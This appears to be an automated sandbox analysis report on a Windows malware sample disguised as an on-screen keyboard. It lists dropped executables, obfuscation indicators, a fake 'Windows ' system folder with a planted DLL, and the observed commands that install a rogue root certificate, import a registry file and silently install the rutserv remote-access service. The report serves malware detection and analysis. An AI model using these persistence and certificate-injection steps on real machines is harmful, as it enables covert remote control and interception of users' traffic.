Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Process created: C:\ProgramData\pass.exe C:\ProgramData\pass.exe
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1wOdXavtlE.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 1wOdXavtlE.exe

Static file information: File size 1285632 > 1048576

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 1wOdXavtlE.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: PasswordOnWakeSettingFlyout.pdb source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp
Source:	Binary string: PasswordOnWakeSettingFlyout.pdbGCTL source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)

.NET source code contains potential unpacker

Source: 1wOdXavtlE.exe, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

PE file contains an invalid checksum

Source: is-PFD3D.tmp.19.dr	Static PE information: real checksum: 0xc2cd should be: 0x193fb
Source: 1wOdXavtlE.exe	Static PE information: real checksum: 0x0 should be: 0x13dc3c
Source: servs.tmp.17.dr	Static PE information: real checksum: 0x0 should be: 0x271505
Source: is-R3F67.tmp.19.dr	Static PE information: real checksum: 0x0 should be: 0x9c1fa0

PE file contains sections with non-standard names

Source: servs.tmp.17.dr	Static PE information: section name: .didata
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: .xdata
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /4
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /19
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /31
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /45
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /57
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /70
Source: is-R3F67.tmp.19.dr	Static PE information: section name: .didata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_00D4CA14 push esp; retn 0278h	0_2_00D4CA21
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC0400 push ecx; ret	0_2_04DC0415
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC65A0 pushfd ; retf	0_2_04DC65A1
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A7000 push 004A70DEh; ret	17_2_004A70D6
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A7980 push 004A7A43h; ret	17_2_004A7A3B
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0043007C push ecx; mov dword ptr [esp], eax	17_2_0043007D
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004990DC push ecx; mov dword ptr [esp], edx	17_2_004990DD
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045608C push ecx; mov dword ptr [esp], ecx	17_2_00456090
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00430094 push ecx; mov dword ptr [esp], eax	17_2_00430095
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00498140 push ecx; mov dword ptr [esp], edx	17_2_00498141
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045A16C push ecx; mov dword ptr [esp], edx	17_2_0045A16D
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045410C push 00454162h; ret	17_2_0045415A
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004251C8 push ecx; mov dword ptr [esp], eax	17_2_004251CD
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0041A1D4 push ecx; mov dword ptr [esp], ecx	17_2_0041A1D8
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00459260 push ecx; mov dword ptr [esp], edx	17_2_00459261
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00430214 push ecx; mov dword ptr [esp], eax	17_2_00430215
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00494220 push 004942FFh; ret	17_2_004942F7
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004223E4 push 004224E8h; ret	17_2_004224E0
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00458380 push ecx; mov dword ptr [esp], edx	17_2_00458381
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00458390 push ecx; mov dword ptr [esp], edx	17_2_00458391
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004953AC push ecx; mov dword ptr [esp], edx	17_2_004953AD
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00493450 push ecx; mov dword ptr [esp], edx	17_2_00493453
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00458464 push ecx; mov dword ptr [esp], ecx	17_2_00458468
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00499470 push ecx; mov dword ptr [esp], edx	17_2_00499471
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00457420 push ecx; mov dword ptr [esp], eax	17_2_00457422
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004544AC push ecx; mov dword ptr [esp], edx	17_2_004544AD
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0048D544 push ecx; mov dword ptr [esp], edx	17_2_0048D546
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00429520 push ecx; mov dword ptr [esp], edx	17_2_00429522
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045A520 push ecx; mov dword ptr [esp], edx	17_2_0045A521
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004595B4 push ecx; mov dword ptr [esp], edx	17_2_004595B5
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00498604 push ecx; mov dword ptr [esp], edx	17_2_00498605

Source: initial sample

Static PE information: section name: .text entropy: 7.52934612956

Source: 1wOdXavtlE.exe, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 1wOdXavtlE.exe, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 1wOdXavtlE.exe, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe

Installs new ROOT certificates

Source: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5E2169F36E05D5652FF097A43315EECA06FC5927 Blob

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\servs.exe	File created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\uxtheme.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File created: C:\Users\user\AppData\Local\Temp\sssevs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-R3F67.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-PFD3D.tmp	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File created: C:\Users\user\AppData\Local\Temp\ssevs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File created: C:\Users\user\AppData\Local\Temp\servs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-1J28N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-2SOD7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-4BBH3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-02I40.tmp	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

